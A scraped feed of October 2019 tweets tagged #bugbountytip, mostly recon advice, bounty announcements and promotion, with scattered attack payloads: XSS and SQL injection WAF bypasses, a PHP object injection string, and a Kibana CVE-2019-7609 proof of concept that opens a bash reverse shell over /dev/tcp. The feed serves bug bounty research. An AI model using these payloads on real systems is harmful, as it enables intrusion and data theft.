0 Here a Google dork for finding ports ; inurl:"https://t.co/q4DIBVJDSJ" #BugBountytip #bugbounty #bugbountytips #Hacking #TogetherWeHitHarder https://t.co/UWdzDXZyhf
(((Gamliel)))
@Gamliel_InfoSec


2019-10-31 04:00:38
0 Added to Fav and waiting to test in a new project. #infosec #hacking #bugbountytip #pentesting #oneliner https://t.co/M5HhlBC8uI
Akshansh Jaiswal
@Akshanshjaiswl


2019-10-31 01:22:25
0 Yay, I was awarded a $1,000 bounty on @Hacker0x01! Account takeover->Make victim login to attacker's account->Make victim account unable to login to his orignal account. https://t.co/JKjOn6nSaA #TogetherWeHitHarder #bugbounty #bugbountytip https://t.co/26tKODyKX4
Shaked Klein Orbach 🇮🇱
@shakedko


2019-10-30 23:10:37
0 Many times I end up finding a test.php with "SIze: 0". I tend to assume that it's there for something, so most likely I will have to guess some parameters. I tried parameth but it didn't work well. Other ideas? #BugBounty #BugBountyTip CC @joohoi - using ffuf
Mohamed R Serwah
@serWazito0


2019-10-30 22:58:55
0 😅 any idea to get privilege escalation after login to ftp using anonymous username ?? #bugbountytip
Ismayil Tahmazov
@Tismayil1


2019-10-30 22:23:15
0 New Fast Subdomain Scanner My First GO experience. Your feedback is important to me. Hopefully it benefits your business. https://t.co/2o2pfa8Pi1 #bugbounty #bugbountytip #bugbountytips https://t.co/HHgGwcRfJ9
bugbountytip
@a_l_e_r_t_1_


2019-10-30 17:57:48
0 https://t.co/fR7SA5JafD Let's hacking together everywhere !!! #BugBountyTip
m0z
@LooseSecurity


2019-10-30 17:41:20
4 A lot of Self XSS is actually just POST XSS. Check if it has a CSRF token! Use your CSRF bypassing techniques to convert it. I've done this before, turned a useless self xss into a $1,000 vulnerability! Stored self XSS? Try a login CSRF chain! #BugBounty #bugbountytip
Dhamu
@Dhamu_offensi


2019-10-30 16:51:04
0 #bugbountytip #bugbounty Don't use Automated exploit tools regarding CVE-2019-11510 - Pre-auth Arbitrary File Reading. Again I try to manually exploited successfully Data breach staff username and password via Pulse Secure Access. https://t.co/3QcJly45ez
Brute Logic
@brutelogic


2019-10-30 14:50:08
2 POI - #PHP Object Injection Leading zeroes & Arbitrary Chars Example: O:008:"stdClass":0001**s:006:"bypass";b:1;} (almost anything can be used in ** ) #bypass #bugbountytip https://t.co/A1dymKmBXV
Jake
@JCyberSec_


2019-10-30 12:00:16
0 I shall test your theory :: #bugbountytip - Don't share your #bugbountytips on Twitter as others will take your methods/tip and leave you with nothing 💰💰💵 https://t.co/OjTno2m0E1
Ismayil Tahmazov
@Tismayil1


2019-10-30 10:17:36
0 #bugbountytips Private Program Suddomains scanned with : https://t.co/LegySAU3sZ Founded new subdomain https://t.co/bLxxHsKcuc -> ApacheTomcat 1 - Dirs scanned founded dir : /files/ 2- PUT method tested and worked. 3 - Shell Uploaded. Bounty : $XXX #bugbounty #bugbountytip https://t.co/8BL8bWvETi
Learner
@LearnerHunter


2019-10-30 08:26:48
1 Here is my 3rd blog post -> https://t.co/MEIkF0X64m @TipsBug #bugbountytip Thanks
Ravindra Sisodia
@InfoSecRavindra


2019-10-30 04:22:08
1 #bugbountytip Always use -b flag in sublist3r, always.
Abdelrhman
@OufZayed


2019-10-30 02:38:45
0 Subdomains Enumeration Cheat Sheet | via:@PentesterLand https://t.co/muezGpC4xg | #recon #bugbountytip
m0z
@LooseSecurity


2019-10-30 00:49:12
0 We're now at 500 members! #BugBounty #bugbountytip #bugbountytips #bugbounties https://t.co/VAYxaqFQNI
👻in🐚
@0xerror


2019-10-29 22:45:18
0 SQLi News: @brutelogic: 'Some MySQL tricks to break some #WAFs out there. SELECT-1e1FROM`test` SELECT~1.FROM`test` SELECT\NFROM`test` [email protected]^1.FROM`test` SELECT-id-1.FROM`test` #SQLi #bypass #bugbountytip ' https://t.co/LCr62t6TKq, see more https://t.co/LbVOSRg1RN
Security Executions Code
@pwn0sec


2019-10-29 20:58:39
0 Information security & Penentration testing new facebook https://t.co/eW4Eo49aMC #bugbounty #bugbountytip #ssrf
Ismayil Tahmazov
@Tismayil1


2019-10-29 20:37:49
0 Application webview URL injection. APK decompiled and scanned. Founded function : goSupport( url ) Created test for injection : com.example.auth://https://t.co/mJqV80lTKH Result : Application opened then webview redirect to my url. #BugBounty #bugbountytip #bugbountytips https://t.co/3CAwg0cnsO
bugbountytip
@a_l_e_r_t_1_


2019-10-29 18:39:22
0 https://t.co/fR7SA5JafD Let's hacking together everywhere !!! #BugBountyTip
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-10-29 18:29:19
7 Some MySQL tricks to break some #WAFs out there. SELECT-1e1FROM`test` SELECT~1.FROM`test` SELECT\NFROM`test` [email protected]^1.FROM`test` SELECT-id-1.FROM`test` #SQLi #bypass #bugbountytip
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-10-29 17:09:22
0 The Web In Depth https://t.co/juiE7cWi2g Follow Us 💰💰💰💰 https://t.co/iNczOcXY13 Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1m84s #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #ceh #eccouncil
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-10-29 17:06:03
0 How To Become A Hacker Follow Us 💰💰 https://t.co/iNczOcXY13 Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1m84s #BugBounty #BugBountyTip #bugbountytips #penetrationtesting #pentesting #devops #devsecops #cybersecurity #hackerone https://t.co/iYO8p512I4
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-10-29 17:00:50
0 Microsoft Tackles Election Security with Bug Bounties Follow Us 💰💰 https://t.co/iNczOcXY13 Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1m84s #BugBounty #BugBountyTip #bugbountytips #pentesting #devsecops #cybersecurity #hackerone https://t.co/QIBjof1ffv
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-10-29 16:57:03
0 Bug Bounty — Tips / Tricks / JS (JavaScript Files) #Bugbounty #BugBountyTip #BugBountyTips https://t.co/GTENhwO3Qz
Avinash Jain
@logicbomb_1


2019-10-29 16:11:31
4 For developers- While developing apps with Spring boot, make sure you don't publically expose below endpoints. For Pentesters/Bug Bounty hunters- Check for below endpoints, it may contain sensitive information. #infosec #bugbounty #bugbountytip https://t.co/B5GJNJ6U4g
Shantanu Kulkarni
@Iamshantanukul


2019-10-29 14:20:45
0 Some MySQL tricks to break some #WAFs out there. SELECT-1e1FROM`test` SELECT~1.FROM`test` SELECT\NFROM`test` [email protected]^1.FROM`test` SELECT-id-1.FROM`test` Thanks to @rodoassis #SQLi #bypass #bugbountytip #bugbounty #hackerone #bugcrowd
Brute Logic
@brutelogic


2019-10-29 14:16:22
36 Some MySQL tricks to break some #WAFs out there. SELECT-1e1FROM`test` SELECT~1.FROM`test` SELECT\NFROM`test` [email protected]^1.FROM`test` SELECT-id-1.FROM`test` #SQLi #bypass #bugbountytip https://t.co/f7tKJFOcGs
Harshal
@Harshal81835744


2019-10-29 10:32:31
0 cloudflare «XSS» payload to bypass protection. {` <body \< onscroll =1(_=prompt,_(String.fromCharCode(88,83,83,32,66,121,32,77,111,114,112,104,105,110,101)))> ´} #BugBounty #BugBountyTip #WAF #infosec
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-10-29 09:02:16
5 Bug Bounty — Tips / Tricks / JS (JavaScript Files) Follow Us Bug Bounty $$$$-- https://t.co/iNczOcGmCt https://t.co/GTENhx5EI7 #BugBounty #BugBountyTip #JS #PenetrationTesting #pentesting #devops #devsecops #cybersecurity
Sayaan Alam
@alamsayaan


2019-10-29 04:51:56
0 It was Really a Long Way.... Finally On Google HOF @GoogleVRP #bugbounty #bugbountytips #togetherwehitharder #bugbountytip #hacking https://t.co/tB7cG6Ylyu
tololovejoi
@tolo7010


2019-10-29 03:29:31
0 Vulnerability gets your report triaged. Impact gets your report rewarded #bugbounty #bugbountytip #bugbountytips
bugbountytip
@a_l_e_r_t_1_


2019-10-29 01:17:49
0 Now 25+ download thank you. Learn & Hack & Earn more money. Good Hacking... https://t.co/fR7SA5JafD #BugBountyTip #xss #xxe #sqli #ssrf #rce #bughunting #bughunters #hackerone #bugcrowd #ruby #python #idor
Brute Logic
@brutelogic


2019-10-28 14:19:16
19 Just an obfuscated alternative to alert(1): https://t.co/JzLTOrQIgp`javas\cript:al\ert(1)` PoC: https://t.co/Xpca5KfJtf #XSS #bugbountytip
Mohamed Sayed
@FlEx0Geek


2019-10-28 12:10:44
2 Topic about Open redirect https://t.co/DfW5qOqhg5 #BugBounty #bugbountytip
Mohamed Sayed
@FlEx0Geek


2019-10-28 12:10:24
0 Topic about Open redirect https://t.co/uBte9Ledhr #BugBounty #bugbountytip
Guhan Raja (குகன் ராஜா)
@havocgwen


2019-10-28 11:49:19
0 Check API requests by adding an invalid parameter sometimes it will be reflected as error in HTML and leads to XSS :) #bugbounty #bugbountytip #API #xss
PikaChu
@intx0x80


2019-10-28 10:15:37
0 PHP Execution 0-Day Discovered in Real World CTF Exercise https://t.co/VPLYXj5f1u #bugbountytip
Λявєη
@spenkkkkk


2019-10-28 09:32:16
0 Does subdomain takeover work for https://t.co/3MKBF2BrBG? #bugbounty #bugbountytip
Sayaan Alam
@alamsayaan


2019-10-28 06:35:00
0 Does anyone know what is going on here... I'm getting multiple profiles of Google HOF @GoogleVRP #bugbounty #bugbountytip #bugbountytips #bugbountyhelp #togetherwehitharder #google #hacking https://t.co/VOPcbCghWi
miraitowa
@miraitowa1


2019-10-28 00:26:07
1 Hacking JSON Web Tokens (JWTs) by @vickieli7 https://t.co/xR60oBxe7d #bugbounty #bugbountytip
bugbountytip
@a_l_e_r_t_1_


2019-10-27 21:17:25
1 Now 25+ download thank you. Learn & Hack & Earn more money. Good Hacking... https://t.co/fR7SA5JafD #BugBountyTip #xss #xxe #sqli #ssrf #rce #bughunting #bughunters #hackerone #bugcrowd #ruby #python #idor
Mahmoud Osama
@Mahmoud0x00


2019-10-27 16:34:59
3 #bugbountytip if you could to reach out to AWS credentials, Configure them in your terminal and then list s3 buckets `aws s3 ls` look for buckets with `AMAZON_SES_SETUP_NOTIFICATION` file, then you will have access to all emails got sent to this email + Ticket trick,You are in!!
Hendrik
@hendrikvb


2019-10-27 13:21:54
0 Silly @Burp_Suite trick of the day: Use advanced scope control for auto-scoping and unscoping, based on regex for ports, files, ports and protocols. #Burp #bugbountytip
SΛKYB
@sakyb7


2019-10-27 08:22:50
0 Hey guys, having hard time to understand http smuggling request.. portswigger web security challenge Video solutions: https://t.co/hZ8CGt6V61 (Basic CL TL Vulnerability) Find all solutions on this YT channel #bugbountytip #bugbounty
tololovejoi
@tolo7010


2019-10-27 01:55:07
0 Security is not so hard. You just need to know the concept #bugbounty #bugbountytip
Learner
@LearnerHunter


2019-10-27 01:06:18
1 Hello friends here is my new blog post in Bug Bounty Writeup Summary -> Please give suggestions/ideas after read Thanks https://t.co/wm0JvWB6Qt #bugbountytip #bugbounty
m0z
@LooseSecurity


2019-10-26 17:43:52
0 The best hacking tool is your brain. Train it! :D #bugbountytip
bugbountytip
@a_l_e_r_t_1_


2019-10-26 16:44:55
0 Less than 1$... Learn on mobile, everywhere & Hack & earn a lot https://t.co/fR7SA5JafD #BugBountyTip #xss #xxe #sqli #ssrf #rce #bughunting #bughunters #hackerone #bugcrowd #ruby #python #idor #manipulation
Sayaan Alam
@alamsayaan


2019-10-26 13:38:23
0 @lcblnc I had found a domain where Access control allow origin - true X frame option - sameorigin... Is it exploitable ...if yes then how.. #bugbounty #bugbountytips #bugbountytip #togetherwehitharder
bugbountytip
@a_l_e_r_t_1_


2019-10-26 13:06:43
0 Less than 1$... Learn on mobile, everywhere & Hack & earn a lot https://t.co/fR7SA5JafD #BugBountyTip #xss #xxe #sqli #ssrf #rce #bughunting #bughunters #hackerone #bugcrowd #ruby #python #idor #manipulation
Ammar Amer🇸🇾
@cry__pto


2019-10-26 10:06:16
3 free udemy courses for a limited time: -1-Master in Hacking with Metasploit: https://t.co/I25d3rBV6r -2-master object oriented php by building a web-application: https://t.co/5wJKzj2Tf0 #bugbountytip #hacking #pentest #cybersecurity #RedTeam #infosec
bugbountytip
@a_l_e_r_t_1_


2019-10-26 08:30:57
0 Less than 1$... Learn on mobile, everywhere & Hack & earn a lot https://t.co/fR7SA5JafD #BugBountyTip #xss #xxe #sqli #ssrf #rce #bughunting #bughunters #hackerone #bugcrowd #ruby #python #idor #manipulation
epxil0n
@lcblnc


2019-10-26 08:10:29
0 ClickJacking is present when these two headers are found. Access-Control-Allow-Origin: * X-Frame-Options: SAMEORIGIN #bugbountytips #bugbountytip #bugbounty
dark_warlord14
@dark_warlord14


2019-10-26 07:51:40
0 Scored my first bounty today on @Hacker0x01. Thank you @zseano @TomNomNom @brutelogic @NahamSec @s0md3v . Your work and notes have helped me to achieve this. #bugbountytip #bugbountytips https://t.co/2uJdRMwnGu
tololovejoi
@tolo7010


2019-10-26 05:36:02
0 A hacker ends his career when he stop learning new things. A company ends their bug bounty program when they stop developing new features. #bugbounty #bugbountytip
Pavandeep
@Pavandep8


2019-10-26 04:23:59
0 Look what I shared: Bypassing CORS - Saad Ahmed - Medium @MIUI| #bugbountytip #Hackers #security @infosecgirls https://t.co/Q8f8YDHFQv
Bibek Shah
@noobibek


2019-10-26 01:18:24
0 BugBounty Tip : If you see "call me" option while 2FA. Click it and check response, it might leak some sensitive info of the account. #bugbountytip #infosec
m0z
@LooseSecurity


2019-10-26 00:23:21
2 more information = more bugs #bugbountytips #BugBounty #bugbountytip
Vishnu Vardhan Gadupudi
@VishnuGadupudi


2019-10-25 22:51:40
0 The Shortest web shell #bugbountytip #rce https://t.co/wy7H21XL1r
Salah Baddou
@chmodxxx


2019-10-25 22:48:11
0 Whoops forgot to #bugbountytip
bugbountytip
@a_l_e_r_t_1_


2019-10-25 22:27:30
0 Now 25+ download. Thank you !!! Less than 1$... Learn on mobile, everywhere & Hack & earn a lot https://t.co/fR7SA5JafD #BugBountyTip #xss #xxe #sqli #ssrf #rce #bughunting #bughunters #hackerone #bugcrowd #ruby #python #idor #manipulation
Ashkan
@11xuxx


2019-10-25 20:35:41
0 Trouble using aquatone? Try it like this: cat target.txt | ./aquatone -scan-timeout 500 -screenshot-timeout 300000 -http-timeout 30000 #bugbountytip
intigriti
@intigriti


2019-10-25 11:48:27
9 Sometimes, one character is all you need! Use % as a wildcard for codes, booking references or even SSN's! 🃏 Awesome #BugBountyTip, @itscachemoney! 👏 https://t.co/bDPq2uINaF
tololovejoi
@tolo7010


2019-10-25 11:14:35
1 The best tools for finding vulnerability are failure, patience, and dedication #bugbounty #bugbountytip
testter
@testter57721185


2019-10-25 09:35:27
0 #bugbountytips #bugbountytip Does knowing the ssokey of the user account constitute a security vulnerability ?
haqpl
@haqpl


2019-10-25 06:27:00
0 #bugbountytip Another trick to cause unexpected behavior of web app is to change the type of variable to an array by adding [] as a suffix to its name: ?var[]=1
lopseg
@lops3g


2019-10-25 03:04:50
0 Recently, I was looking for an XSS payload without spaces and slashes, but I didn't find one that worked. I built the below, it worked like a charm: <svg%0aonload=alert()> #bugbountytip
Sayaan Alam
@alamsayaan


2019-10-25 02:32:29
0 Yay... Got My First Bounty of $500 From Google.... The Way HOF Started #bugbounty #bugbountytip #hacking #togetherwehitharder .. Motivated By - @_jensec @ehsahil @sehacure @logicbomb_1 https://t.co/pEosbaurZO
bugbountytip
@a_l_e_r_t_1_


2019-10-24 20:02:23
0 Less than 1$... Learn on mobile, everywhere & Hack & earn a lot https://t.co/fR7SA5JafD #BugBountyTip #xss #xxe #sqli #ssrf #rce #bughunting #bughunters #hackerone #bugcrowd #ruby #python #idor #manipulation
A hacker's life
@Unknownuser1806


2019-10-24 13:40:51
0 Bypass Uppercase filters like a PRO (XSS Advanced Methods) https://t.co/WSvDTsESMe #poc,#bugbountytip,#bugbounty,#hacking,#cybersecurity,#infosec
intigriti
@intigriti


2019-10-24 12:44:30
12 The best way to cause errors exposing sensitive information? ➡️Long strings in POST parameters (50.000+ characters) ➡️Using the 'Euler number' (e) in numbers to gain exponentially large values Thanks for the #BugBountyTip, @pxmme1337! https://t.co/gPJ37I6o7z
Emre Selim
@emre_selim8


2019-10-24 12:44:29
0 Does BugCrowd pay bounty for "Won't Fix" Bugs? #BugBounty #BugBountyTip #BugCrowd
Sayaan Alam
@alamsayaan


2019-10-24 09:10:40
0 Hello Infosec Community.... So Guys Let's Everyone Share Their High school percentage.....Many Newbies Will Get Idea Who Thinks that they are not doing good... #bugbounty #bugbountytip #togetherwehitharder #ethical #hacking #hackerone #bugcrowd #cybersecurity
Yadhavi
@PrincessYadhavi


2019-10-24 08:53:30
0 How to hack Rabbitmq? #bugbounty #bugbountytips #bugbountytip
Sayaan Alam
@alamsayaan


2019-10-24 07:45:30
0 It was a Nice One... #bugbounty #bugbountytips #bugbountytip #togetherwehitharder https://t.co/ZOnkntsAvW
Henry Chen
@chybeta


2019-10-24 03:45:06
3 NOTICE THIS TWEET : https://t.co/x68iNP6F7u recommended configuration for nextcloud with nginx and php-fpm is vulnerable... #bugbounty #bugbountytip #bugbountytips https://t.co/cAqptRR0Ez
Håkon Lønmo
@WriteAV


2019-10-23 17:08:48
0 Just made the @visma hall of fame for security researchers. #bugbountytip, no bounty though :-)
Gwendal Le Coguic
@gwendallecoguic


2019-10-23 13:39:28
3 We always talk about methodology to find subdomains, but what about domains first ? What if you want to enlarge your scope, I use https://t.co/nTkWllAwGH https://t.co/VP7PDYC7VZ https://t.co/PfUAtO6Okp https://t.co/35MVruXUTz to find more domains owned by a company #bugbountytip
Gwendal Le Coguic
@gwendallecoguic


2019-10-23 13:05:49
1 Using @Hackerone as a recon tool. Some companies use formatted nicknames for team members/bots which is nice to find private programs you're not invited. Check the huge sitemap. #bugbountytip https://t.co/fILuM5WpDF
bugbountytip
@a_l_e_r_t_1_


2019-10-23 10:27:54
0 Less than 1$... Learn on mobile, everywhere & Hack & earn a lot https://t.co/fR7SA5JafD #BugBountyTip #xss #xxe #sqli #ssrf #rce #bughunting #bughunters #hackerone #bugcrowd #ruby #python #idor #
Karna
@karna__1


2019-10-23 08:34:50
0 I forgot to take my laptop today and was super bored at my office. So I installed Termux (Android terminal) and started running my recon tools 😂🔥 Hit Termux if you forget your laptop! #bugbountytip #bugbountytips What other Android tools do you use @s0md3v https://t.co/fUPLoMGlk7
bugbountytip
@a_l_e_r_t_1_


2019-10-23 06:46:20
0 Less than 1$... Learn on mobile, everywhere & Hack & earn a lot https://t.co/fR7SA5JafD #BugBountyTip #xss #xxe #sqli #ssrf #rce #bughunting #bughunters #hackerone #bugcrowd #ruby #python #idor
Eduard Tolosa
@Edu4rdSHL


2019-10-22 20:27:50
2 Nice article explaining how to get Findomain working in Windows. It's recommended for any user that want to use your Windows OS for security testing. #BugBounty #bugbountytip #enumeration #subdomains #recon #hacking https://t.co/PT8G1B1Gyr
Aziz Hakim
@hackerb0y_


2019-10-22 19:50:46
0 #bugbountytip Create a mind map && make your own recon list #infosec #bugbounty
bugbountytip
@a_l_e_r_t_1_


2019-10-22 18:50:53
0 Less than 1$... Learn on mobile, everywhere & Hack & earn a lot https://t.co/fR7SA5JafD #BugBountyTip #xss #xxe #sqli #ssrf #rce #bughunting #bughunters #hackerone #bugcrowd #ruby #python #idor #manipulation
bugbountytip
@a_l_e_r_t_1_


2019-10-22 17:48:56
0 Less than 1$... https://t.co/fR7SA5JafD #BugBountyTip #xss #xxe #sqli #ssrf #rce #bughunting #bughunters #hackerone #bugcrowd #ruby #python #idor #manipulation
Murdockz
@Murdockz_CEH


2019-10-22 16:53:20
0 I earned $2,000 for my submission on @bugcrowd https://t.co/1IfbGhMzx1 #ItTakesACrowd API endpoint to create a new user account -> No Auth Token -> Created admin account with @target.com domain -> Admin Account Takeover. #bugbounty #bugbountytips #bugbountytip
Hendrik
@hendrikvb


2019-10-22 15:40:57
0 Build a custom wordlist for each dirsearch #recon, to include robots.txt, sitemap and spidered paths. #bugbountytip #BugBounty
Aashish Yadav
@aa5h15h


2019-10-22 15:34:08
2 Redis Unauthorized Access Vulnerability Simulation https://t.co/VvAv50TepM #bugbounty #bugbountytip #devops #linux #unix #windows #programmer #programming #like #retweet #followme #follow #python #php #java #redis #oscp https://t.co/m6EzTxV8G0
Luthra
@team0xL


2019-10-22 12:59:22
0 Awarded $1,000 bounty #bugbountytip Sometimes expired domain can help you to get juicy stuff. So, bruteforce the subdir on expired domain #bugbounty
bugbountytip
@a_l_e_r_t_1_


2019-10-22 10:43:58
0 Less than 1$... https://t.co/fR7SA5JafD #BugBountyTip #xss #xxe #sqli #ssrf #rce #bughunting #bughunters #hackerone #bugcrowd #ruby #python #idor #manipulation
Dawood Ikhlaq
@daudmalik06


2019-10-22 09:20:47
0 Found SQLI ? App is protected with incapsula waf by @Imperva ? blocking sleep keyword ? 😀 Just found the bypass of latest incapsula WAF sle%25p%28'0x12'%2b1) => sleep('ox12' + 1) write-up coming soon.. #sqli #bugbountytip @Imperva #incapsula #waf
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-10-22 06:25:29
1 from @EdOverflow : Thanks for the amazing #bugbountytip - https://t.co/zGwejuI2Xy
florens
@florens25301329


2019-10-21 23:25:58
0 Has anyone got any resources on XPath injection? #BugBounty #bugbountytip
Anshuman Pattnaik
@anspattnaik


2019-10-21 18:14:46
0 #bugbountytip #BugBountyTips I am trying to Smuggle an HTTP request with https://t.co/eVHtHgJ1d3 but in the response 411 status code "No Content-Length". Payload (Tried many other too) Content-Length: 5 Transfer-Encoding: cow chunked bar 0 Can you please suggest me any tips?
bugbountytip
@a_l_e_r_t_1_


2019-10-21 16:54:02
0 Less than 1$... https://t.co/fR7SA5JafD #BugBountyTip #xss #xxe #sqli #ssrf #rce #bughunting #bughunters #hackerone #bugcrowd #ruby #python #idor #manipulation
A hacker's life
@Unknownuser1806


2019-10-21 11:46:01
0 Recon resources Best article from @PentesterLand https://t.co/psZ1iens0p #bugbounty,#bugbountytip,#hacking,#infosec
Henry Chen
@chybeta


2019-10-21 11:41:06
8 writeup: ..%3B -> tomcat manager -> getshell https://t.co/ZEvOjcDhw8 #bugbounty #BugBountyTips #bugbountytip https://t.co/NBjLRgiaIt
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-10-21 10:22:03
0 #BUGBOUNTYTIP - When in Doubt , Enumerate ! Be Persistent! 🎖💸💸 💰💰💰💰 #bugbounty #bugbountytips
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-10-21 09:55:59
0 Get C|EH Certified with HackDoor Trainings Follow Us 💰💰💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #BugBountyTips #devsecops #cybersecurity #ceh #eccouncil https://t.co/0gfcgW7uTM https://t.co/kVnk39ItNa
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-10-21 09:55:45
0 Get C|EH Certified with HackDoor Trainings Follow Us 💰💰💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #BugBountyTips #devsecops #cybersecurity #ceh #eccouncil https://t.co/0gfcgW7uTM https://t.co/KfndxlL7zs
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-10-21 09:55:34
0 Get C|EH Certified with HackDoor Trainings Follow Us 💰💰💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #BugBountyTips #devsecops #cybersecurity #ceh #eccouncil https://t.co/0gfcgW7uTM https://t.co/Or6ej2AaAo
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-10-21 09:55:21
0 Get C|EH Certified with HackDoor Trainings Follow Us 💰💰💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Chanel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #BugBountyTips #devsecops #cybersecurity #ceh #eccouncil https://t.co/0gfcgW7uTM https://t.co/le5tIA5Nqm
Imran Parray
@CreedHackers


2019-10-21 09:14:19
0 When it comes to API testing finding new endpoints is one of the important technique that shouldn't be ignored at all. But most of the people do it wrong. Recursion techniques can be combined with endpoint extracting tools to get best out of them. #bugbountytip #cybersecurity https://t.co/ACV6BZXWt7 https://t.co/lLOhjFFPQj
Ammar Amer🇸🇾
@cry__pto


2019-10-20 15:22:12
4 free udemy courses for a limited time about : -1-hacking:https://t.co/lNIWJMNiM4 -2-malware:https://t.co/AaTAC6Av1U -3-upowork:https://t.co/FJBRRDzCnW -4-NGINX:https://t.co/XIOzfR8GWh #bugbountytip #hacking #malware #infosec #cybersecurity #PenTest #Linux
Max
@0xw2w


2019-10-20 13:15:43
1 Bug bounty tip: Always check allowed websites in CSP policy. There is a chance, that domain/bucket is not claimed or CSP pointing to file hosting. For example, I once found CSP was pointed to https://t.co/a5bttaghT7. #bugbountytip #togetherwehitharder
Saurav
@amian_saurav


2019-10-20 12:40:27
0 Finding deep level domains through simple dorking. site:*.site.com-www site:*.*.site.com-www site:*.*.*.site.com-www #BugBountyTips #BugBounty #bugbountytip
Henry Chen
@chybeta


2019-10-20 10:09:32
7 CVE-2019-7609 If you can't pop a shell via the last tweet , you can change poc like 👇 .es(*).props(label.__proto__.env.AAAA='require("child_process").exec("bash -c \'bash -i>& /dev/tcp/127.0.0.1/6666 0>&1\'");//') #BugBountyTips #BugBounty #bugbountytip https://t.co/BaeSZwDbGu https://t.co/XLGHJnxT0Y
Kenan
@h1_kenan


2019-10-20 07:52:45
5 KONA #WAF #bypass #XSS #bugbountytip asd"on+<>+onpointerenter%3d"x%3dconfirm,x(cookie) enjoy 😉👍
baaay
@abaykandotcom


2019-10-20 06:32:39
0 CodeLabs took the initiative to make it easier for you who want to learn XSS by making a 'labs' where anyone can try and/or learn XSS in a basic way. #xss #BugBounty #BugBountyTips #bugbountytip https://t.co/WIMJZS6pnj https://t.co/bJNfFdJutr
Kom[S]REd
@jauharali


2019-10-20 06:23:12
0 “A Study of Security Headers — Learning Notes” by Kom[S]REd https://t.co/YRKFYCnPX1 #pentest #bugbountytip #security
Eduard Tolosa
@Edu4rdSHL


2019-10-20 01:40:23
1 Findomain 0.6.0 is out! New features: * Option to discover subdomains IPs and save to file * Option to use quiet mode to remove informative messages * Add ability to save new domains found in a TXT file while monitoring. Please RT https://t.co/tkgBfKirNP #BugBounty #bugbountytip
Sudoka
@sudo_sudoka


2019-10-19 17:32:48
0 Analysis of #CVE-2019-16278, an #unauthenticated remote code execution in the Nostromo web server, aka nhttpd, a popular open-source web server in BSD systems. All versions up to the latest release 1.9.6 are vulnerable. Path traversal to RCE! #bugbountytip https://t.co/tzL9YrLXzI
Wareeq🕸🐁
@wareeq_shile


2019-10-19 17:05:36
0 Kindly subscribe and like their content @nvisium https://t.co/z5FtAQg8YC can we get a retweet? #BugBounty #bugbountytips #bugbountytip
John mash
@Techhelplistcom


2019-10-19 17:00:01
0 i have uploaded 126 new articles as a pdf files about different fields of hacking to my github repository enjoy! #bugbountytips #pentest #redteam #OSINT #Malware #cybersecurity #hacking #infosec #bugbountytip https://t.co/fNomAu16P2 https://t.co/3SQwGkXxII
Ammar Amer🇸🇾
@cry__pto


2019-10-19 16:12:30
11 i have uploaded 126 new articles as a pdf files about different fields of hacking to my github repository enjoy! #bugbountytips #pentest #redteam #OSINT #Malware #cybersecurity #hacking #infosec #bugbountytip https://t.co/q2layzVpKz https://t.co/7o4QgYRMvC
Shlomie Liberow
@Shlibness


2019-10-19 13:38:21
0 Submitted an HTTP Smuggling attack and was initially rejected on low impact but found a /redirect endpoint which followed a poisoned referer header. Since I was able to set poisoned headers to an external host... #bugbountytip https://t.co/kxBCsU2Y9d
A hacker's life
@Unknownuser1806


2019-10-19 12:47:41
0 From Multiple IDORs leading to Code Execution on a different Host Container https://t.co/v519vssv7q #bugbountytips,#bugbountytip,#cybersecurity,#infosec
m҉4҉x҉X҉.҉!҉
@Deepak_maxx


2019-10-19 12:42:04
0 Finally! Reported First XSS of my life 😅 on one of the private program @Hacker0x01. The application was sanitizing alert, script, ", etc But following payload got me through! <svg/onload=prompt (1)> #bugbountytips #bugbounty #bugbountytip
Nick (or hunt4p1zza)
@ngkogkos


2019-10-19 11:35:48
0 Just ate a well-known WAF for breakfast. <form><button formaction=javascript:top['ev'+'al'](self['\x61\x74\x6f\x62'](`YWxlcnQoMSk7`));// See picture for detailed explanation and tips. #bugbounty #bugbountytip Kudos: @PortSwiggerRes, @brutelogic, @wugeej . https://t.co/4Phkolgoso
✎ /𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-10-19 05:33:51
3 🛡 « https://t.co/ItNKqoJWJC\%3C/onscroll/=1(_=prompt,_(String.fromCharCode(88,83,83,32,66,121,32,77,111,114,112,104,105,110,101)))%3E Try this one. ⛑ dot shot. 💣 » #BugBounty #BugBountyTip #WAF #infosec
✎ /𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-10-19 05:29:33
